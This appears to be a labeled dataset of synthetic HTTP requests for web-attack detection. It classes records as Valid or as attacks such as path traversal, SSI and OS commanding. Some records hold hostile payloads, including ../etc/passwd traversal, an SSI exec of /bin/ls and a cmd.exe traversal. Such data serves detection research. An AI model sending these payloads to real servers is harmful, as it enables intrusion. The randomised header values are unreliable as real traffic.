Cookie: bpaedehhSbos=c3vp9koee1se;ucefnnrsoawel=489016;trelu0zhjnet1r=rdgOjrenenan;lYrneUael=t;Mz0-2shutdown=uandnln96;C.T-=96951784
Cookie2: $Version="012"
Date: Sat, 05 Aug 06 04:20:23 GMT
ETag: W/".yUJODkEXkhnKuu"
Expect: eU45eS
From: qyfmaeSc@eieatsEee.st
If-Modified-Since: Sun, 24 Sep 06 21:36:46 UTC
If-Unmodified-Since: Fri, 23 Dec 05 04:22:22 GMT
If-Match: "A-InsQrWTheAQrh7"
If-None-Match: "RaLxJEY@sr-eBEn3p."
If-Range: Fri, 17 Aug 07 14:11:40 UTC
Max-Forwards: 978
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: NTLM T2ZlbW9lZmRvZWVsb2RkdDZLYTR0RWV0OWNhNGU4T0hjaW9E
Authorization: NTLM MFVQZDBlaWtMaWdhM2x3UnNleGU4c3RBZmViZmFuYWdhaEFyZWVFTG9hTjV2b1I=
Range: 30510-65,097-,-5721
Referer: http://www.aao2eaa.ch/hoes4it/toas/bqenebs/ercoha.php4
TE: deflate,trailers
Trailer: If-Unmodified-Since
User-Agent: u8ppnalaat/9.3.7.4
UA-CPU: x86
UA-Disp: 537,5554,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 643x366
Via: 3.3 197.238.252.163:317, Rhre/4.3 151.81.220.171:949
Transfer-Encoding: deflate
Upgrade: arbqe/0.4, stO/8.7, nMx/4.4, ioMi4D/1.1, oChir/3.9
Warning: 862 206.156.153.95 "wercou" "Sun, 10 Oct 04 22:26:24 GMT"
X-Forwarded-For: 11.178.147.8
X-Serial-Number: 52905795752439402910
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13339
Start - Id: 38125
class: LdapInjection
GET /_6/iusseexddhsdsgA2/dnitatst1syitd5pSa1/sIBF5Jf_5FY-kqwuBF/ztnry/ossRe/ggblAlms.gif?ainasiho=8a&mhuYen=64225198&8cnt=uepassthrun+eatc&trf=eytc&gtsneyhTn=segrwp-nafh&7WuG=kNY&X-between-=%29++%28+%7C++++%28dcm%3Dsb*%29&shcOcimoOjvq=eexeceYadrrqtdropwsr&sbser5xcn=805081690&e4kKesmysgaaehi=wMcasIocoplOn1o&ueeAuta6te=846&nOdeoead=oRnMco&85lbl6sEaneA=crot3eohwn%3Atelnetsj8&Zbc@b1jY=8733957 HTTP/1.1
Host: www.eleyonmj.fr
Connection: taZOb
Accept: text/*, image/*;q=0.6, video/*
Accept-Charset: x-mac-arabic, windows-874;q=0.1
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: max-age=9
Client-ip: 76.39.81.250
Cookie: fp9McEBB5=aQ5YOl;71ttSes=titXDf;idq=680;zesx3f9neatat=1
Cookie2: $Version="2"
Date: Mon, 27 Sep 04 20:06:19 GMT
ETag: W/"XSJy2BP.3@6hcqV.O8h6"
Expect: 100-continue
From: r0roy@hbe7rHPeNd.st
If-Modified-Since: Thu, 30 Aug 07 03:30:15 UTC
If-Unmodified-Since: Sat, 07 Jan 06 20:21:37 GMT
If-Match: "vIbaxHQqUtZ1XmV03qxq"
If-None-Match: *
If-Range: Wed, 18 Mar 09 23:25:26 CET
Max-Forwards: 2398
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: ttA2f lstyphu=yxiY
Authorization: Digest algorithm=MD5-sess
Range: 17768-5
Referer: http://www.keal.ch/xWhi/ilutoev/itrm/tblo/nn8ijmLh.cfm
TE: trailers,chunked
Trailer: Trailer
User-Agent: Mozilla/2.4 (X11; U; Unix 6.0; lt-en; rv:1.3.8) Gecko/09163081
UA-CPU: 68000
UA-Disp: 072,9161,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 9991x6291
Via: 3.4 www.tldoTlna.jpg, HTTP/4.6 133.110.171.24
Transfer-Encoding: deflate
Upgrade: gsce/8.8, osc/5.9, loe/5.9, ect/1.6, 1xRehs/4.9
Warning: 380 www.gtcrerT.html:4591 "ksmndhegEt2od" "Sat, 04 Oct 08 01:21:24 GMT"
X-Forwarded-For: 106.193.146.221
X-Serial-Number: 7877748356062880
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38125
Start - Id: 18865
class: Valid
GET /sbHy-sP0wfJ1/n8qs-UKxf/92ns3iniogctz/saerqn3vEeEhaetd/2cEH8sZh8V@hfmrWeXq/rM-UPsF/tCBhMqn2IonE/na/rcpZt96tAZarM/_var2Q9script/eopies.msf?5lsGkJkDOQ=l5%5Dt1&jbrtenie=hovoih&rttbde0lceotw7j=1834174037&Gl00V=6&bo=hOerusgm05t&peaidlaaT8xEm=tslatrmq&od0nce=97174019&asaar=Otll&sOoe6hCix=5FX&rbdteEaosaoYW=uatiu&ebente3h4=951&hejCpsMechoz7=ynwhteekyes HTTP/1.0
Host: www.1aIdg1hhat.org
Connection: aptr
Accept: text/plain;q=0.6, application/*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 123.230.139.164
Cookie: exea4qsos=ispm7ieenwtto
Cookie2: $Version="71"
Date: Tue, 22 Mar 05 05:52:24 GMT
ETag: "MHHSCRN0UYv5T3YfADCy"
Expect: 100-continue
From: mogs@imsit.st
If-Modified-Since: Sun, 06 Jan 08 12:09:20 GMT
If-Unmodified-Since: Wed, 02 Aug 06 03:16:50 UTC
If-Match: "vS2iWi2qPEZ.vB70f"
If-None-Match: "jzUYyKpHLYv5E4a"
If-Range: Mon, 09 Aug 04 06:16:06 GMT
Max-Forwards: 88
MIME-Version: 5.7
Pragma: qet=lsh
Proxy-Authorization: Basic Z2xucmVpbTpHYXNvdWVrbw==
Authorization: Digest realm
Range: 33-,46-263308
Referer: /Twae/ueizuy/oje2akn/regh/breq.css
TE: trailers
Trailer: Host
User-Agent: Mozilla/7.8 (compatible; MSIE 3.4; Solaris; grM7trn)
UA-CPU: PowerPC
UA-Disp: 708,1125,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 754x840
Via: FTP/1.2 167.233.47.24
Transfer-Encoding: compress
Upgrade: sst/1.2, yoeg/0.2, eryeo/8.7, fnres/9.9
Warning: 951 www.irwnsd.tiff "9rmmauuilegoneDwol22" 
X-Forwarded-For: 56.146.49.3
X-Serial-Number: 65367829353425279089
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 18865
Start - Id: 23684
class: Valid
GET /r7eg/elaAres/OrA/ABv_BhtaccesWxterm2bgsound.php3?sdy6eoNeNo9=mbaAhuulse6yew&br0vmwCa=roche&Ejglissiasln=r&etfqte=nRdpassthru%3DTsszrobjecta%7C&uwfuWhseca4szat=lpELwvAz.U&srlfsue3idoka=553059584 HTTP/1.0
Host: www.vyendeeies.uk
Connection: keep-alive
Accept: image/gif, text/plain;q=0.2
Accept-Charset: windows-1250, x-mac-ce
Accept-Encoding: 
Accept-Language: idsegy-aam7hH;q=0.9
Cache-Control: only-if-cached
Client-ip: 3.52.184.2
Cookie: Ei=9285116;4tr=Sao0tvarpasswdf;der=15551
Cookie2: $Version="37"
Date: Sun, 03 Jun 07 23:29:38 GMT
ETag: "ipjhgHBbLfuc67d66"
Expect: eDesmago=oewEaor
From: lanon@fBeece5si.gov
If-Modified-Since: Wed, 22 Jun 05 13:02:23 GMT
If-Unmodified-Since: Wed, 12 May 04 10:56:21 GMT
If-Match: *
If-None-Match: "FN3WxO6Qrl9v881"
If-Range: *
Max-Forwards: 701
MIME-Version: 4.4
Pragma: nE='eicr'
Proxy-Authorization: eaweh z0t6U6=ndaum
Authorization: NTLM cHR0QW5ub3JheWlhMHRhZW9TaHRNZW9hamVhdGpsUkVB
Range: 5716-
Referer: http://www.dAsarh.org/dd9tz/8syf/uhkbi.exe
TE: trailers,trailers,trailers
Trailer: From
User-Agent: Mozilla/7.3 (compatible; Konqueror/6.4; WinNT; fmet; taeaetnn; 1sQaen)
UA-CPU: MIPS
UA-Disp: 188,809,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 961x2992
Via: 6.8 123.180.144.134, FTP/1.7 204.72.200.21, 2.5 www.qtwts.jpg
Transfer-Encoding: deflate
Upgrade: 85ipnt/6.3, atout/3.2
Warning: 864 120.66.207.244 "ttya" 
X-Forwarded-For: 11.1.75.209
X-Serial-Number: 13224
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23684
Start - Id: 20776
class: Valid
GET /einI/tDval3Ou0Uh_/j9F7orNefs9.pl? HTTP/1.1
Host: 65.239.201.220:80
Connection: tqTtlj
Accept: */*
Accept-Charset: iso-8859-1, iso-8859-6, x-mac-icelandic
Accept-Encoding: deflate, identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 132.58.67.73
Cookie: imgmpMformydvQPim=dexec;tbrnunhn=0739451704
Cookie2: $Version="57"
Date: Sat, 26 Jun 04 10:26:19 GMT
ETag: W/"qfJA0jbXXdDwigNHh"
Expect: 100-continue
From: txeT@aevntoegn.com
If-Modified-Since: Sun, 05 Jun 05 13:23:09 GMT
If-Unmodified-Since: Mon, 30 Oct 06 09:05:49 GMT
If-Match: *
If-None-Match: "vFpbAFNJ7SAYg7tVj4J"
If-Range: *
Max-Forwards: 7
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Basic YUQ4cXlvczpvYWVhU3dJZQ==
Authorization: A6wip eoItrafl=irtdcVL
Range: 68-16
Referer: /kdies.js
TE: deflate
Trailer: If-Range
User-Agent: Mozilla/4.8 (compatible; Konqueror/7.6; Win 9x; geioerxec; Ki0wenlWO; rw3InobIb)
UA-CPU: Sparc
UA-Disp: 369,7940,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2009x4676
Via: atee/8.1 www.DRoehne3.tiff
Transfer-Encoding: 4nvuaT
Upgrade: ichhc/3.2
Warning: 220 www.htxyn.js:56846 "tipspynata3kBht" "Tue, 15 Sep 09 04:06:34 CET"
X-Forwarded-For: 174.119.33.87
X-Serial-Number: 0880116781853820645
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20776
Start - Id: 31357
class: Valid
GET /e5Bt75_NAuoV@WPE73w/h94b5/tO9b8QFpmd/qehhAr/2QD-XAD1/eIRVxA/oG.R6ax4k5h3Srq/hbbl340c.dll?8NRe3JT3qD=dwMBbS&htaccesbetweene-Kndeletevj=51423&rell4mIt=g7hNzEeiopmZEsr&eservicesOb2BvS1x=F8ree&qEcq=5taahy2u9Ehbeha&i3annoesEbcax=21496&HBW2WbKw4locationKJ=677&ityielisdamRmoN=n1iwtPcnecb6&Ngnaedl=passthruy HTTP/1.1
Host: www.nlqnuccTos.be:30
Connection: close
Accept: video/*;q=0.0, video/*;q=0.2
Accept-Charset: macintosh, iso-8859-8
Accept-Encoding: gzip;q=0.4, compress;q=0.3
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 34.199.208.241
Cookie: eARag5rsgmn=lrrebiOvdehrilu4an;onde3Ne=79551764;6thasytn=evallog0;zilnrTrr=Re;nxk5en29est=fealdtecoatPprhu;hsyeun1=947771793
Cookie2: $Version="38"
Date: Thu, 03 Jun 04 10:08:52 CET
ETag: W/"QD7G_upMUzYLHZ4"
Expect: 100-continue
From: iaamdisn@peasep.org
If-Modified-Since: Sat, 06 Jun 09 08:57:07 CET
If-Unmodified-Since: Sun, 05 Aug 07 09:54:06 CET
If-Match: "0S7jyLSWsp-YnNuzcb"
If-None-Match: "shL30E.z48i471pTe"
If-Range: *
Max-Forwards: 8
MIME-Version: 5.1
Pragma: onFuh=zdnno6oa
Proxy-Authorization: NTLM dHJkanQ2cmNlYXdPZXJtbnppZWV1dHRvb0dlZnVvYm9pZmhwYU52aXVzOG53VXJh
Authorization: Digest response="3cF4A7Efa9Cf8C844FFEffd30CBbD47A"
Range: 8-,2512-,696-3957
Referer: /1ePaaeA3/JGaptc/loao6u/ttxyne/rcsmc.php3
TE: chunked
Trailer: TE
User-Agent: Mozilla/3.5 (compatible; ugker; SunOS sun4u; inaelmdej; alxas; 5anIetbo)
UA-CPU: x86
UA-Disp: 2596,238,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 562x0900
Via: 2.5 www.ni0l.html:0, 1.1 www.ev16.html
Transfer-Encoding: D3eprL; SWturi=ayur
Upgrade: lil/6.2
Warning: 013 www.desun.jpg "AikotD" "Sun, 12 Nov 06 05:18:44 UTC"
X-Forwarded-For: 122.12.60.197
X-Serial-Number: 56784
----: ---------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 31357
Start - Id: 46062
class: PathTransversal
GET /1ujlnrYxI9/eehzseahHeo/dV@2.shtml?XEF5-=eAe&X0dnP=wdn&Iboot.iniaAOFoj=5&y1=46096746&R3IxmtTrir=ewtei&tneiadecph=oa%3Chtpasse HTTP/1.0
Host: www.1w0ooaerr.uk
Connection: amiuRn
Accept: text/*, application/zip;q=0.8, application/*
Accept-Charset: windows-1257, x-mac-chinesetrad;q=0.3
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 26.105.166.147
Cookie: hrdT=../../../../../../../../../etc/passwd
Cookie2: $Version="569"
Date: Tue, 03 May 05 17:40:08 UTC
ETag: "axONWIwct8-.klnXM"
Expect: Ttoi0msq=5atahp;titpe4j=2irdonpv
From: Uglt@gX3ubtt.gov
If-Modified-Since: Wed, 07 May 08 09:05:08 UTC
If-Unmodified-Since: Mon, 03 Mar 08 13:48:20 CET
If-Match: *
If-None-Match: "xuK_9S5fGkIp@00mMzYX"
If-Range: *
Max-Forwards: 18
MIME-Version: 2.6
Pragma: v=nos1ol
Authorization: Basic bjltbjBiOklhYUM=
Range: 245987-,327-287216
Referer: /pEtwsdda/entsdm5.tar
TE: trailers
User-Agent: qRMJMf http://www.ccszmfi.biz
UA-Disp: 266,3482,8
UA-OS: Windows 95
Via: FTP/2.9 180.248.22.115, fyan/5.1 212.230.222.56
Transfer-Encoding: nmhd; ernggzoE=sievas
Upgrade: e8tdi/9.1
Warning: 150 www.zkc9.js:3 "ceisnt" "Sat, 08 May 04 14:12:08 CET"
X-Forwarded-For: 232.217.218.144
~~~~~: ~~~~~~~~~~~~

null

End - Id: 46062
Start - Id: 39882
class: SSI
GET /6itetgl/pV7/sslnmEe/tL7GaZa.asp?iaiaeeaseoslq=2A97N9g%400g_&hiyce=nrmpshhp+&oime9rtr81sdo=6&h6hcEW.iframe=969&ohhaDnf2iIar=tJ3GM0nAH.&Mhnqyg=hksJX5jqxXv&alo0oeRre=tt%25+&ashsioaafatdol=2&wsntuntL=a8la&5urs7gTaysliuee=Mcr3nelsDsna0nMe&annhN=ee&TdtoFEeerteioia=30767954&4uch68rpdtrd=aleaSsacepgosde HTTP/1.1
Host: www.itaRm.uk:80
Connection: urse
Accept: */*
Accept-Charset: utf-7;q=0.9, euc-cn
Accept-Encoding: identity;q=0.1, deflate;q=0.2
Accept-Language: *
Cache-Control: no-cache
Client-ip: 36.201.117.148
Cookie: ice9teJ5=<!--     #exec cmd="/bin/ls   -l     /home/dt2vHnQb/relnNrieeK" -->;oshly73rmj=whjsystem;6beW0passthruhW5tg=48Erx;oPotrthed4winIq=eDrefcil;hptdra=telnetwcfromutg;oTdwonts=rssm
Cookie2: $Version="35"
Date: Mon, 11 Aug 08 14:43:27 CET
ETag: "e_E8OD0quw@4vReJ"
Expect: jlcei3
If-Modified-Since: Mon, 22 Oct 07 20:07:08 GMT
If-Unmodified-Since: Mon, 10 Oct 05 03:29:32 CET
If-Match: "CKykt.AXg7LguOzTgn"
If-None-Match: "-Hms8LDC_-O8WFFDZ"
If-Range: "zNlJrn2Y3Evp-zbh58o"
Max-Forwards: 21
Pragma: iri5shE=gado
Proxy-Authorization: Digest realm
Authorization: NTLM aXNydGVyaW5VMG10dFRPcmhkZTl0cmhlZXRveGxvZHNkaWx0bA==
Range: 06297-343355,-00060,-2025
Referer: http://www.eaY1e.fr/aa7Tp/sEtbi94s/Yi8segj2.mp3
TE: gzip;q=0.5
User-Agent: Mozilla/2.6 (X11; U; Open BSD i586 0.8; ci-he; rv:4.9.5) Gecko/80871053
UA-OS: Solaris
Via: HTTP/0.9 www.nshBdimq.gif, 2.6 www.luebS5rm.tiff
Transfer-Encoding: sewnz; iiruw9n=ilhoth
----: ------------------------------------------------

null

End - Id: 39882
Start - Id: 44292
class: OsCommanding
GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+ HTTP/1.1
Host: 235.76.244.38
Connection: keep-alive
Accept: */*
Accept-Charset: isiri-3342
Accept-Encoding: 
Accept-Language: OnwSa-yteam
Cache-Control: no-store
Client-ip: 171.2.10.60
Cookie: psc=tm;lunionWkAVku7.=668483
Cookie2: $Version="583"
Date: Sat, 11 Feb 06 11:59:47 GMT
ETag: "b_1HVy3bbCtIipID7"
Expect: 100-continue
From: aEtkm@tNLeshe.uk
If-Modified-Since: Mon, 10 Mar 08 02:18:41 UTC
If-Unmodified-Since: Sat, 15 May 04 06:31:45 UTC
If-Match: *
If-None-Match: *
If-Range: "PnObIr1--fPNEcLS0iL"
Max-Forwards: 2554
MIME-Version: 6.9
Pragma: lrigoc=gt5oath
Proxy-Authorization: NTLM b1dmc2ZsdHh6cmV0d2F0dDlsYmlkYWhpc2lrcW5kYWFlOHJ1Zw==
Authorization: wnaeh oheL=ooeioN
Range: 77-00,194-
Referer: /ulea5vL/rsesacy/e2fb53/oeR9sv.jsp
TE: chunked,chunked,gzip;q=0.6
Trailer: If-Match
User-Agent: Mozilla/9.0 (compatible; haKfmspx; Mac OS X; dhlIhCn)
UA-CPU: PowerPC
UA-Disp: 9070,4804,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 6071x5916
Via: Tei8/8.8 205.87.46.2
Transfer-Encoding: Oserkm; tohe=lu8n
Upgrade: Aers/1.0, riij1i/9.6
Warning: 525 251.120.159.217 "ay2yetttoyyhQsouLs" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 11968
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44292
Start - Id: 18911
class: Valid
GET /aoKLM1RutaIJP/iZ1Fo8MFh-x-PhK5_Qvt/E1pheeoooAg/uh/pctslannwboRbrcWt/mxc0ds565sN0/0KN@VSHR6b4A4kamv/sFLXWmRYX/sn1snui/Nel/1arcblgspMmethhtrhs.png?hF=hp&neanctasdcnr4x=IeKnrkvastiu HTTP/1.0
Host: www.etaael.net
Connection: keep-alive
Accept: video/*;q=0.7, image/*
Accept-Charset: *;q=0.9
Accept-Encoding: identity;q=0.3
Accept-Language: *;q=0.9
Cache-Control: ktr4cei='ee5'
Client-ip: 166.177.25.206
Cookie: vIQeVL=izaldsss2c517tr;sPU6XOv0A5Ys=23791716
Cookie2: $Version="0"
Date: Wed, 29 Jun 05 24:10:25 CET
ETag: "HBxiEPbrzHOsoQpTJI"
Expect: leet=odiaciA;rke1x
From: yjsS@orU9r.uk
If-Modified-Since: Wed, 05 Sep 07 04:21:47 CET
If-Unmodified-Since: Sun, 31 Jan 10 13:16:29 GMT
If-Match: "a@b2WkLAFKSQTaWK"
If-None-Match: "xP2Ogq1WPNqI2sd"
If-Range: Sat, 29 Oct 05 10:37:15 GMT
Max-Forwards: 476
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM ZW9ldzcxdGluZG43NHZ0ZWVvZHlBVHJ0aXRodXB0bGk=
Range: 3104-33,76-
Referer: /r5e0renn/oetpeg/h6Oomos/dsufacu/aIcy.php3
TE: trailers,deflate;q=0.5
Trailer: Expect
User-Agent: Mozilla/7.6 (Machintosh; U; PPC 3.6; tt-dj; rv:5.8.7) Gecko/97026014
UA-CPU: Sparc
UA-Disp: 7305,2751,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 905x897
Via: HTTP/0.8 76.203.153.103
Transfer-Encoding: compress
Upgrade: eRaba/1.6, mmqn2/8.0, cwzoea/3.0
Warning: 591 www.Inocpwr.jpeg "jhrOCtrecdie2dm" "Sat, 02 Aug 08 12:29:30 CET"
X-Forwarded-For: 197.169.87.183
X-Serial-Number: 27260320301
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 18911
Start - Id: 24911
class: Valid
GET /GspcBaTHJpositionA/Aer7art9/i7a1a3eas6r/_aZSe/RKvsQtbUDsz_2/fyOdS/evAadhs/r0OZf/47czkphppZspasswd-/sJzo5AroKhZhmlK@/ntvkodmoshoryto.aspx?ny=a2rt0gphpobject%3A&twcnHpxaIi=do+t&aohwt3ej=tb%3Fdt9wherele%3B&aaif=%3E9access_log%29usre&meeot=9999 HTTP/1.1
Host: www.eteeGaaat.ch
Connection: close
Accept: audio/basic, audio/*;q=0.5
Accept-Charset: *;q=0.9
Accept-Encoding: compress;q=0.8, identity, deflate, identity;q=0.4, deflate
Accept-Language: c-3eetmseM;q=0.4, e2hh0-Nl5nh
Cache-Control: min-fresh=41923
Client-ip: 250.47.10.133
Cookie: ytegrowau2isumo=0;hLre=lpEF;IdeexecS=916;n9yunu7eu9S1l=3insertc;hadhi=eINo
Cookie2: $Version="412"
Date: Tue, 06 Jan 04 04:26:03 CET
ETag: W/"@PFwuy_CDfc9Wn35@u@N"
Expect: 0diAIo2=iagel
From: pwmfp9h@tptOa1oce.de
If-Modified-Since: Sun, 17 Jul 05 06:08:10 UTC
If-Unmodified-Since: Thu, 19 May 05 10:26:37 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 21 Oct 07 21:40:37 GMT
Max-Forwards: 57
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Digest opaque="nodeiar"
Authorization: rh5t iaieE=7thte1i
Range: -115
Referer: /eonfqtng.jsp
TE: deflate,chunked
Trailer: If-Range
User-Agent: Mozilla/0.9 (Windows; U; Windows NT 8.7; SR-m8; rv:6.3.7) Gecko/11461259
UA-CPU: MIPS
UA-Disp: 149,2049,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5160x7333
Via: 7.0 106.98.209.27, 6.5 www.atmT.html, ghEcny/7.9 93.29.205.253
Transfer-Encoding: uu3tjn
Upgrade: sur/1.8, znripg/6.2, halyeo/7.1, osto/6.9
Warning: 183 238.92.156.51 "hdeD1us6xXiS0zlurs" "Sun, 02 Jan 05 14:53:03 GMT"
X-Forwarded-For: 45.246.59.205
X-Serial-Number: 7194664350
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24911
Start - Id: 1312
class: Valid
GET /htGV7Ya6Z55Z0cC/2ib243a/OMhEsystemmochaOSbYi5open4e/a.he/ye9aodt/auWNuTpk1dylpd2/mMmdjnRTZzxbh1jST38/TmailaoI04@LI3w/g4YWMTN93XtIE-u/o3Q-Spf.png? HTTP/1.0
Host: www.o6ru4laL.fr:80
Connection: close
Accept: audio/x-wav;q=0.5, application/*
Accept-Charset: iso-8859-7, windows-1254;q=0.1, x-mac-arabic;q=0.9, x-mac-arabic;q=0.6
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: d=jm0jA
Client-ip: 213.92.26.169
Cookie: eilnaioNfpN4=ii;utas3aiEbCetna=union';n656u=iS0xzLD2;sts=3807
Cookie2: $Version="5"
Date: Mon, 07 May 07 20:14:51 GMT
ETag: W/"zd6qw1kLW-ebI-o2"
Expect: 2arTnecm
From: strldbE@9qmhittm.gov
If-Modified-Since: Sun, 26 Mar 06 03:43:12 UTC
If-Unmodified-Since: Fri, 06 Feb 09 23:10:09 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 07 Dec 04 22:23:30 CET
Max-Forwards: 72
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Basic dE8zb3I6aHNrdGt2Nm8=
Authorization: Basic YWNpbG5oOk9lMWFlb29l
Range: -216
Referer: http://Oiomopst.cz/jplel9ei/gijyn/emojdrsi.shtml
TE: chunked,gzip;q=0.0,gzip;q=0.2
Trailer: Host
User-Agent: Mozilla/1.4 (compatible; MSIE 7.6; Windows NT; eTgthcltol)
UA-CPU: Sparc
UA-Disp: 142,095,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 7486x696
Via: tIewee/8.4 106.252.118.214:31, jitm/7.9 www.hEnr.png
Transfer-Encoding: deflate
Upgrade: mutL/9.2, iiM/7.3, lustl/1.7
Warning: 222 www.adbe.jpg "ebprbkhtcfatduen" "Mon, 20 Mar 06 12:05:20 UTC"
X-Forwarded-For: 47.248.188.232
X-Serial-Number: 855751913795
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1312
Start - Id: 14097
class: Valid
GET /frntasei75eog72Ar1ai/HP1B7/n4ossa8fciyaldA3ym.html?iCadsmSttbmTtaq=sformwhere+Stmmiuni&febH.GW0b=+derd&n3Rp=i1HQ8R0x0u&a0eahDnhejm=8qwh&Eeaf=esynqkn&sebsrr=1670&heallYWtyu-=ijolopt&X43Vx=lthrqpwso2teq7&jy7odtnynemne=7%3E14d+a%3F%27otn+or&Lva599linkhPph=a&1osurn7dldt9t=nIaoe3Z4tNq5fl&uqte0thth=tDSn&gciimryilreeiqg=4dse HTTP/1.1
Host: www.kTuyisste.gov
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: gzip;q=0.1, deflate, gzip, compress;q=0.3, compress
Accept-Language: eno7lru-rmE, aeuAmpm-e9hsea, ffimoer-wdisadd;q=0.9
Cache-Control: no-cache
Client-ip: 250.248.98.251
Cookie: ni0=Bfcyu group by0s<YoMD;eelfef=11933
Cookie2: $Version="3"
Date: Fri, 27 Feb 09 23:05:17 GMT
ETag: W/"OFX8qW6@tVkBPnDzL"
Expect: sK3n=wyein
From: apCylsgf@aiOdeitn.it
If-Modified-Since: Sun, 27 Nov 05 01:29:37 CET
If-Unmodified-Since: Fri, 06 Jan 06 15:02:33 GMT
If-Match: "OihgoSJEGwNDQGEZVdZB"
If-None-Match: "usIDgmAjVqZCh.RyN"
If-Range: Sun, 20 Jun 04 14:13:44 CET
Max-Forwards: 3
MIME-Version: 9.9
Pragma: usl730='hihb'
Proxy-Authorization: Basic cnhlaXN1czplb3hldGk=
Authorization: iA4ip dP8y=lSo3uei
Range: 784942-,615-
Referer: http://www.cvuzbx.st/th9rin/n6dkedrr.wav
TE: gzip,gzip
Trailer: Host
User-Agent: t1doertsN (f7cW_@BoJ; 1QWNyJKG)
UA-CPU: 68000
UA-Disp: 9144,843,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 5013x5767
Via: 7.6 92.153.139.209
Transfer-Encoding: compress
Upgrade: AwRag/8.7, eiPt/1.4
Warning: 330 107.110.243.183 "eugbdottuttihe6M9i" 
X-Forwarded-For: 123.87.48.214
X-Serial-Number: 45329823
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14097
Start - Id: 36283
class: PathTransversal
GET /qOL/rur/7drmfGkfJ.png?5yySbaoilxe4te=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html HTTP/1.0
Host: www.hsuoAms.gov:0006
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: deflate;q=0.9, deflate
Accept-Language: *;q=0.1
Cache-Control: min-fresh=19206
Client-ip: 114.100.144.6
Cookie: gsdp=lvBO5RCIPS;input2xdiv=8440557;aeefytTidndpTr=NvOacceptsa
Cookie2: $Version="483"
Date: Sun, 30 Nov 08 21:21:24 UTC
ETag: "1JtsCU7mfRg5csIR4J"
Expect: mAraDYns
From: 7sEpze@hrhiarN7.de
If-Modified-Since: Sat, 11 Mar 06 19:55:46 GMT
If-Unmodified-Since: Tue, 06 Jan 04 17:48:11 UTC
If-Match: *
If-None-Match: "10VRY0GGsC.J-tBl3In"
If-Range: "I_lM8h_X2LcpVp2.CIA"
Max-Forwards: 7640
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: NTLM aXVmc2llbjJSZ2VvSGVlc2wwdW90N2FvYWV6ZXRyYWg=
Authorization: Digest uri=/ohyil/aroargkr/gi5s/ifatlbm/wsnitgp.asp
Range: 507970-,9199-
Referer: /1txse/agntseoL/qmNy/Orait.php3
TE: trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/5.7 (Windows; U; WinNT 9.3; ii-gt; rv:7.7.4) Gecko/02907278
UA-CPU: 68000
UA-OS: Solaris
UA-Pixels: 1458x3720
Via: 4.7 0.148.172.169:706, 6.3 www.xmdw.css, 5.2 177.50.169.107
Transfer-Encoding: identity
Upgrade: ye1nNS/5.5
Warning: 577 www.vkgsei.gif "nyhteteay" "Wed, 04 Jun 08 24:04:38 UTC"
X-Serial-Number: 3858869813582017
----: -----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 36283
Start - Id: 33189
class: Valid
POST /arn99jwosohrken/eot3pieatn2iLegiu/-a8/oBHQ/eE5.aspx? HTTP/1.1
Content-Length: 250
Content-Language: weo
Content-Encoding: gzip
Content-Location: http://ty5cf.de/rltei/seoia/aeAYar.txt
Content-MD5: bWZzZWFsTXRhaXJvZ2Uxbw==
